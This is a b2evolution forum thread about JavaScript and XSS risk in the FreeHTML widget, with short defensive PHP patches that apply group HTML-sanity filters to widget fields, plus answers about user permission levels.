Not a bug.

Sorry, but YOU gave them permission to do that right? Recognize that b2evolution does not give a blog to someone or give them permissions to do anything with any blog. YOU do that, so you own what happens.

EdB wrote:

Sorry, but YOU gave them permission to do that right?

I only gave them the permission to use a blog and to publish post.

Except with FreeHTML, there is no way for a blog's owner to directly put javascript on the blog...

bye

Crack open the free html widget and add this to the bottom of the code ( before final } )

	function set( $var, $value )
	{
		check_html_sanity( $value );
		parent::set( $var, $value );// having errors stops dbupdate()
	}

Note : if any illegal markup is found the the contents of the widget are emptied

¥

*edit*
Code improvement, widget value isn't emptied on errors

adiGuba wrote:

EdB wrote:

Sorry, but YOU gave them permission to do that right?

I only gave them the permission to use a blog and to publish post.

Except with FreeHTML, there is no way for a blog's owner to directly put javascript on the blog...

bye

Nope, sorry, not totally accurate. You absolutely MUST give them permission to affect blog settings before someone can even see that there is a "widgets" tab to play with.

A brand new user in the default configuration of the "bloggers" group can not add, edit, or delete a widget. The permissions for this particular group allow only posting private or draft. More importantly, this group has nothing checked for "Edit blog settings". When I check the box for "Edit blog settings -> Feat." the user in this group is able to access the "widgets" subtab and (of course) use the widgets.

This is not a bug. This is not a security problem. This is something that YOU can choose to give bloggers, or not.

¥åßßå : Thanks for the code. I will try it ;)

EdB : affect blog settings is different from allowing javascript.

I want "bloggers" to be allowed to post or edit blog settings, but not to directly put javascript...

The problem is that even if you ban javascript for every group, no matter what access levels they have, if they have the ability to play with widgets then they can enter javascript into any widgets settings that allow html.

Buggered if I can think of a foolproof solution ( for all widgets ) ..... maybe I need more beer?

¥

¥åßßå : your code is OK :D

I've looked more precisely at the code, and I think i found a foolproof solution ( for all widgets )

On the file inc/plugins/_plugin.funcs.php, the function autoform_validate_param_value() already check date depending on the type.

Just add the following code in the switch($meta['type']) :

	case 'html_input':
	case 'html_textarea':
		check_html_sanity( $value ); 
		break;

So all HTML field from plugins/widget will use the security filters defined on user's group.

I think it should be included as standard...

bye

Yeah, I'd thought of inc/widgets/model/_widget.class.php function set() ... I can see it generating bugs though, just not sure if I'm "over thinking" ;)

¥

...javascript is allowed in html so preventing javascript would mean changing the widget to be not freeHTML but limitedHTML or ltdHTML. Anyway ...you get my point. I like the freeHTML plugin.

disclaimer: I don't fully understand the security/user-levels model yet so take what I say with that in mind. (^:

Could the widget only appear if you're at the highest user-level?

Like I say above if you restrict content and freeHTML becomes some sub-set of what's allowed in HTML (as defined by the HTML specification) then it's a completely different widget. But I guess it doen't allow php so it's already a sub-set anyway.

I like the freeHTML widget and I use it for javascript.
I guess there might be a better way for me to insert the javascript?

Using check_html_sanity() on the FreeHTML widget dont totally forbid javascript. It simply use the security filters defined on the user group :

• Prevent CSS tweaks WARNING: if allowed, users can easily deface the site, add hidden text, etc.

• Prevent iframes WARNING: if allowed, users may do XSS hacks, steal passwords from other users, etc.

• Prevent javascript WARNING: if allowed, users can easily do XSS hacks, steal passwords from other users, etc.

• Prevent objects WARNING: if allowed, users can spread viruses and malware through this blog.[/list:u]

Bye

PadreSol wrote:

But I guess it doen't allow php so it's already a sub-set anyway.

PHP is not part of the HTML specification, so not allowing PHP doesn't make it a sub-set ;)

¥

¥åßßå wrote:

PadreSol wrote:

But I guess it doen't allow php so it's already a sub-set anyway.

PHP is not part of the HTML specification, so not allowing PHP doesn't make it a sub-set ;)

¥

Ok, maybe I shouldn't have said specification. I guess I meant since php is embedded in HTML, commonly, then the freeHTML doesn't allow everything that is commonly allowed in HTML.

While were kind of on the topic...is there a doc that describes what each user-level allows? I have looked and I still have yet to fiigure that out.

For example at what level can a user upload files so that they can use a photoblog?
Can widgets be configured to only be allowed at a certain level? Or does widget access become available at one-level and then all levels greater-than?

adiGuba wrote:

Using check_html_sanity() on the FreeHTML widget dont totally forbid javascript. It simply use the security filters defined on the user group :

• Prevent CSS tweaks WARNING: if allowed, users can easily deface the site, add hidden text, etc.

• Prevent iframes WARNING: if allowed, users may do XSS hacks, steal passwords from other users, etc.

• Prevent javascript WARNING: if allowed, users can easily do XSS hacks, steal passwords from other users, etc.

• Prevent objects WARNING: if allowed, users can spread viruses and malware through this blog.[/list:u]

Bye[/quote] It's still not clear to me, are these configurable per content-type? I'm new to all this.

PadreSol wrote:

I guess I meant since php is embedded in HTML, commonly, then the freeHTML doesn't allow everything that is commonly allowed in HTML.

Try using php on a server that only allows html ;)

PadreSol wrote:

For example at what level can a user upload files so that they can use a photoblog?

From experience, users need to be level 2 to play with files

PadreSol wrote:

Can widgets be configured to only be allowed at a certain level? Or does widget access become available at one-level and then all levels greater-than?

All or nothing I'm afraid, if a user has access to ( blog settings I *think* ) then they have access tro widget settings, if they don't then they don't

¥

PadreSol wrote:

It's still not clear to me, are these configurable per content-type? I'm new to all this.

This is configurable on the "user's group" page
Example on the demo : http://demo1.b2evolution.net/stable/admin.php?ctrl=users&grp_ID=4
(login: admin ; password: demopass)

=> So admin can decide who can use JavaScript and who cannot use it !

bye

User level is used very rarely. Someone can upload files if you give them the permission to upload files. The types of files that can be uploaded are also up to you, but not on a per-blogger basis.

Widgets are available to bloggers based on permission to access blog settings, and as far as I know widgets are generally not "level sensitive".

The different options for html checking stuff is set for each user group. The users tab, click the group name to change them.

¥åßßå wrote:

Try using php on a server that only allows html ;)

Yah but we're talking about a php-based blog.

Thanks for the help on the user-levels.